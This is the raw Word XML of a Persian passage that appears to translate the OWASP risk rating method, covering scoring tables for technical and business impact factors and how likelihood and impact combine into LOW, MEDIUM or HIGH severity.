        <w:t>باز هم، هر عامل دارا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مجموعه ا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از گز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ها است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و هر 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از گز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دارا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تأث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رتبه 0 تا 9 است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ما از این اعداد بعدا برای  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>برآورد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تاثیر کلی استفاده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کنیم.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2847D75F" w14:textId="77777777" w:rsidR="00C94CAE" w:rsidRPr="00B23932" w:rsidRDefault="00C94CAE" w:rsidP="00C94CA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71E0ECF" w14:textId="77777777" w:rsidR="00563843" w:rsidRPr="00C94CAE" w:rsidRDefault="00C94CAE" w:rsidP="00563843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C94CAE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عوامل تاث</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94CAE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رگذار</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94CAE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فن</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94CAE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14:paraId="072AF6FD" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="003C1DE7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C1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تأث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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>رات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تواند به عوامل همسو با نواح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امن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سنت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مربوط شود</w:t>
      </w:r>
      <w:r w:rsidR="009B340C">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">: 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محرمانه بودن، </w:t>
      </w:r>
      <w:r w:rsidR="009B340C">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>صحت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>، دسترس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و </w:t>
      </w:r>
      <w:r w:rsidR="0036594F" w:rsidRPr="0036594F">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>مسئوليت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9B340C"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>هدف ا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اگر آس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پذ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مورد </w:t>
      </w:r>
      <w:r w:rsidR="009B340C">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">نفوذ 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قرار گ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رد،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زان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تاث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بر س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را برآورد کند.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16520EF2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51414E1" w14:textId="77777777" w:rsidR="00CD576A" w:rsidRDefault="00CD576A" w:rsidP="00CD57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نبود محرمانگی</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71FA11" w14:textId="77777777" w:rsidR="00CD576A" w:rsidRDefault="00CD576A" w:rsidP="005D53EB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CD576A">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>چقدر داده ها را م</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD576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D576A">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> توان افشا کرد و چقدر حساس است</w:t>
      </w:r>
      <w:r w:rsidR="00CC6AE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؟ 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حداقل </w:t>
      </w:r>
      <w:r w:rsidR="005D53EB" w:rsidRPr="00CD576A">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">داده 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>غ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حساس منتشر شده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(2)</w:t>
      </w:r>
      <w:r w:rsidR="00CC6AEF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حداقل</w:t>
      </w:r>
      <w:r w:rsidR="00CC6AEF" w:rsidRPr="00CC6AEF">
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> 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>داده ها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افشا شده (6)، داده ها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غ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حساس گسترده ا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که افشا شده اند (6)، داده ها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گسترده افشا شده، تمام داده ها افشا شده است (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05934176" w14:textId="77777777" w:rsidR="00C243A9" w:rsidRDefault="00C243A9" w:rsidP="00C243A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7D42F2D4" w14:textId="77777777" w:rsidR="00C243A9" w:rsidRDefault="00C243A9" w:rsidP="00C243A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lastRenderedPageBreak/>
        <w:t>نبود صحت</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A9A3E" w14:textId="77777777" w:rsidR="00C243A9" w:rsidRDefault="00C243A9" w:rsidP="00C243A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چقدر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داده میتواند </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>خراب ش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ود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و چقدر آس</w:t>
      </w:r>
      <w:r w:rsidRPr="00C243A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243A9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د</w:t>
      </w:r>
      <w:r w:rsidRPr="00C243A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243A9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است؟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کمی داده کمی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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>خراب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شده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(1)،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کمی داده خیلی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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>خراب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شده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(3)،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خیلی داده کمی خراب شده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(5)،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خیلی داده خیلی خراب شده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(7) تمام داده ها کاملا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خراب شده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(9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ABED4D" w14:textId="77777777" w:rsidR="00CD576A" w:rsidRDefault="00CD576A" w:rsidP="00CD57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0EBB8655" w14:textId="77777777" w:rsidR="00CD576A" w:rsidRDefault="005D53EB" w:rsidP="00CD57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نبود دسترسی</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1D18F6" w14:textId="77777777" w:rsidR="005D53EB" w:rsidRDefault="005D53EB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چقدر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سرویس دهی میتواند از دست رود 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و چقدر ح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است؟ حداقل خدمات ثانو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قطع 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شود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(1)، حداقل خدمات اول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قطع شد (5)، خدمات ثانو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گسترده</w:t>
      </w:r>
      <w:r w:rsidR="0036594F">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> قطع ش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ود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(5)، خدمات اول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="0036594F">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> گسترده قطع ش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ود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(7)، تمام خدمات به طور کامل از ب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بروند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(9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3653640B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3831C932" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="0036594F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نبود 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>مسئوليت</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69005CC7" w14:textId="77777777" w:rsidR="0036594F" w:rsidRDefault="0036594F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6594F">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>آ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اقدامات مهاجم به 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فرد قابل رد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است؟ کاملا قابل رد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(1)، احتمالا قابل رد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(7)، کاملا ناشناس (9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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF4216C" w14:textId="77777777" w:rsidR="0036594F" w:rsidRDefault="0036594F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29B311FD" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="0036594F" w:rsidP="0082563A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36594F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عوامل موثر بر کسب و کار</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C5E403" w14:textId="77777777" w:rsidR="0082563A" w:rsidRDefault="00A46606" w:rsidP="00A4660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تاثیر کسب و کار ناشی از تاثیر فنی است، اما نیازمند درک عمیق اینکه چه چیزی برای شرکتی که اپلیکیشن را اجرا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کند مهم است، دارد . در صورت کلی،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شما باید پشتیبانی خطر های خود را با تاثیرات تجاری هدف قرار دهید، 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>به و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ژه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اگر مخاطب شما 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در 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>سطح اجرا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باشد.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>ر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تجار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چ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ز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سرما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گذار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را در حل مشکلات امن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توج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کند.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C91D69" w14:textId="77777777" w:rsidR="004C102E" w:rsidRPr="00A46606" w:rsidRDefault="00AF611B" w:rsidP="00D93343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AF611B">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>بس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از شرکت ها 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راهنما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طبقه بند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دارا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دارند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و/یا یک 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مرجع تاث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تجار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برا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کمک به رسم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کردن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آنچه که برا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کارشان اهم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دارد.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استانداردها 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توانند به شما در تمرکز بر آنچه واقعا برا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امن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اهم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دارند کمک کن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ن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د.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اگر اینها در دسترس نبودند، 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پس با افراد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که کسب و کار را درک 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کنند صحبت کن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93343">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تا بدانید از نظر آنها چه چیزی مهم است.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757A0235" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="00D93343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D93343">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>فاکتورها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 xml:space="preserve"> ز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نواحی رایج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 xml:space="preserve"> بس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 xml:space="preserve"> از کسب و کارها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است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>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ولی این ناحیه </w:t>
      </w:r>
      <w:r w:rsidR="00F66D75">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>برای یک سازمان حتی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خاص </w:t>
      </w:r>
      <w:r w:rsidR="00F66D75">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تر است از عوامل مرتبط با عامل تهدید، آسیب پذیری و تاثیر فنی.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3ACE1" w14:textId="77777777" w:rsidR="00F66D75" w:rsidRDefault="00F66D75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ضرر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مال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</w:p>
    <w:p w14:paraId="5BFC16DE" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="00F66D75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ضرر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مال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ناش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یک نفوذ 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>چقدر خواهد بود؟ کمتر از هز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رفع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پذ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(1)، اثر جزئ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بر سود سالانه (3)، تاث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قابل توجه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بر سود سالانه (7)، ورشکستگ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(9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71062866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1448C486" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="00F66D75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آسیب به شهرت</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A7F8B5" w14:textId="77777777" w:rsidR="00F66D75" w:rsidRDefault="00F66D75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F66D75">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>آ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یک نفوذ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که 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>منجر به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رس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دن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اعتبار م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شود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>به کسب و کار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رساند؟ حداقل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(1)، از دست دادن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بیشتر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حساب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ها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(4)، از دست دادن حسن ن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(5)،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رساندن به نام تجار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(9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD2227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E14094F" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="00F66D75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F66D75">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>عدم انطباق</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B5FF0F" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="00F66D75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F66D75">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>چقدر در معرض عدم انطباق قرار م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رد؟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نقض جزئ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(2)، نقض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واضح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(5)، نقض بالا (7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E069089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2CE38015" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="000009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000943">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>نقض حر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خصوص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</w:p>
    <w:p w14:paraId="2EB574D4" w14:textId="77777777" w:rsidR="00563843" w:rsidRDefault="000009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000943">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>چقدر اطلاعات شخص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قابل شناسا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تواند افشا شود؟ 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فرد (3)، صدها نفر (5)، هزاران نفر (7)، م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ل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ون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ها نفر (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024FC2A2" w14:textId="77777777" w:rsidR="00000943" w:rsidRDefault="00000943" w:rsidP="000009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48EA7D9E" w14:textId="77777777" w:rsidR="00000943" w:rsidRPr="00000943" w:rsidRDefault="00000943" w:rsidP="00000943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lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00000943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قدم 4: تعیین کردن مهلک بودن خطر</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E1FC27" w14:textId="77777777" w:rsidR="00000943" w:rsidRDefault="00000943" w:rsidP="00EA18E0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000943">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>در ا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قدم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ما قصد دار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برآورد احتمال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و برآورد تأث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را برا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محاسبه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مهلک بودن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خطر کنار هم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قرار ده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>.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تمام کاری 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که با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در ا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نجا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انجام ده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>م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کشف کردن ا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آ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احتمال </w:t>
      </w:r>
      <w:r w:rsidR="00EA18E0" w:rsidRPr="00EA18E0">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>LOW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، </w:t>
      </w:r>
      <w:r w:rsidR="00EA18E0" w:rsidRPr="00EA18E0">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>MEDIUM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، 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EA18E0" w:rsidRPr="00EA18E0">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>HIGH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است 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و سپس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برای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تاثیر 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هم هم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کار را انجام ده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>م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.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ما فقط 0 تا 9 مق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اس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را به سه قسمت تقس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خواه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کرد.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06934847" w14:textId="77777777" w:rsidR="0055731C" w:rsidRDefault="0055731C" w:rsidP="0055731C">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72B30C30" wp14:editId="59E77A3B">
            <wp:extent cx="3996984" cy="2192987"/>
            <wp:effectExtent l="171450" t="190500" r="194310" b="188595"/>
            <wp:docPr id="1" name="Picture 1" descr="C:\Users\XXX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XX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84" cy="21929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B4872AE" w14:textId="77777777" w:rsidR="0055731C" w:rsidRDefault="0055731C" w:rsidP="0055731C">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05646178" w14:textId="77777777" w:rsidR="0055731C" w:rsidRPr="006E51EC" w:rsidRDefault="00F012D2" w:rsidP="0055731C">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pP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روش غ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E51EC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6E51EC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ر</w:t>
      </w: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رسم</w:t>
      </w:r>
      <w:r w:rsidRPr="006E51EC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14:paraId="76FBED6A" w14:textId="77777777" w:rsidR="0055731C" w:rsidRDefault="003D3779" w:rsidP="003D377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D3779">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>در بس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از مح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ط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با دقت نگاه کردن به عوامل و دریافت کردن جواب ها، هیچ مشکلی ندارد. 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>شما با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از طر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ق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عوامل فکر کن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و عوامل کل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"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محرک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" را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شناسایی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که نت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جه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را کنترل م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کنند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>شما ممکن است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>با در نظر گرفتن جنبه ها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خطر که واضح ن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ست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متوجه شو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که تصور اول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شما اشتباه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بوده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است.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CFFDE2" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRDefault="00F012D2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7B4BA309" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRPr="006E51EC" w:rsidRDefault="003D3779" w:rsidP="00F012D2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روش تکرارپذ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E51EC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6E51EC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ر</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA8B9B" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRDefault="002A6B23" w:rsidP="00EF20E0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2A6B23">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>اگر شما ن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به دفاع از رتبه بند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EF20E0" w:rsidRPr="003D3779">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تکرارپذ</w:t>
      </w:r>
      <w:r w:rsidR="00EF20E0"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EF20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کردن آنها دارید</w:t>
      </w:r>
      <w:r w:rsidR="00EF20E0"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 xml:space="preserve"> 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ممکن است بخواه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فرا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ند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رسم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عوامل و محاسبه نت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جه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را دنبال کن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>.</w:t>
      </w:r>
      <w:r w:rsidR="00EF20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به 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داشته باش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که در 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برآوردها، عدم اطم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نان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ز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وجود دارد و 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عوامل برا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کمک به شما برا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رس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دن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به نتا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ج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معقول</w:t>
      </w:r>
      <w:r w:rsidR="00EF20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>در نظر گرفته شده</w:t>
      </w:r>
      <w:r w:rsidR="00EF20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روش م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تواند توسط ابزارها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خودکار پشت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بان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شود تا محاسبات ساده تر شود.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A6C2F" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRDefault="00EF20E0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EF20E0">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>اول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گام ا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از گز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مربوط به هر عامل را انتخاب کرده و شماره مربوطه را در جدول وارد کن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>. سپس شما به طور متوسط م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انگ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امت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ازات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را برا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محاسبه احتمال کل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بدست </w:t>
      </w:r>
      <w:r w:rsidR="00192D55">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">می 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>آور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>. مثلا:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23652DBA" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRDefault="00B35922" w:rsidP="00192D5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 w14:anchorId="20491F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19.25pt">
            <v:imagedata r:id="rId8" o:title="2"/>
            <v:shadow opacity=".5" offset="6pt,6pt"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B980C90" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRDefault="00F012D2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1326E1E8" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRDefault="00192D55" w:rsidP="00192D5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192D55">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>بعد، ما با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تاثیر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را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دریابیم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>. ا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روند در ا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نجا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مشابه است. در بس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از موارد، پاسخ واضح خواهد بود. شما م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بر اساس عوامل برآورد کن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نمرات برا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هر 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از عوامل را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میانگین بگیرید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>. باز هم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کمتر از 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00192D55">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>LOW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است، 3 تا 6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00192D55">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>MEDIUM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است و 6 تا 9 </w:t>
      </w:r>
      <w:r w:rsidRPr="006E51EC">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r w:rsidRPr="00192D55">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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>است. مثلا:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B542D8" w14:textId="77777777" w:rsidR="00192D55" w:rsidRDefault="00B35922" w:rsidP="00192D55">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"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pict w14:anchorId="3053B4F5">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:465.8pt;height:116.75pt">
            <v:imagedata r:id="rId9" o:title="3"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D22FD6" w14:textId="77777777" w:rsidR="00192D55" w:rsidRDefault="00192D55" w:rsidP="00192D5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0B81F6A4" w14:textId="77777777" w:rsidR="00192D55" w:rsidRPr="006E51EC" w:rsidRDefault="006E51EC" w:rsidP="006E51EC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تع</w:t>
      </w:r>
      <w:r w:rsidRPr="006E51EC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یی</w:t>
      </w:r>
      <w:r w:rsidRPr="006E51EC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ن</w:t>
      </w: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مهلک بودن</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DFB983" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRDefault="0066288E" w:rsidP="0066288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به هر حال ما به مرحله ی تخمین احتمالات و تاثیرات رسیده ایم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اکنون م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آنها را برا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رتبه بند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مهلک بودن</w:t>
      </w:r>
      <w:r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>نها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ر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ترک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>. توجه داشته باش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که اگر اطلاعات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تاثیرات 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کسب و کار خوب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داشته باشید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با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از آن به جا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اطلاعات تاث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استفاده کن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>. اما اگر شما اطلا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عات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در مورد کسب و کار ندار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تاث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بهتر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ز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بعد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است.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DC9875" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRDefault="00B35922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 w14:anchorId="1651FB4A">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:467.05pt;height:124.3pt">
            <v:imagedata r:id="rId10" o:title="4"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D16705" w14:textId="77777777" w:rsidR="00F012D2" w:rsidRDefault="00F012D2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2969EC3B" w14:textId="77777777" w:rsidR="0066288E" w:rsidRDefault="0066288E" w:rsidP="009B34B8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66288E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>در مثال بالا، احتمال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>ات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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>MEDIUM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>، و تاث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1D73BB" w:rsidRPr="0066288E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r w:rsidR="001D73BB"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>است، بنابرا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منظر صرفا فن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به نظر م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رسد که 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>مهلک بودن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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
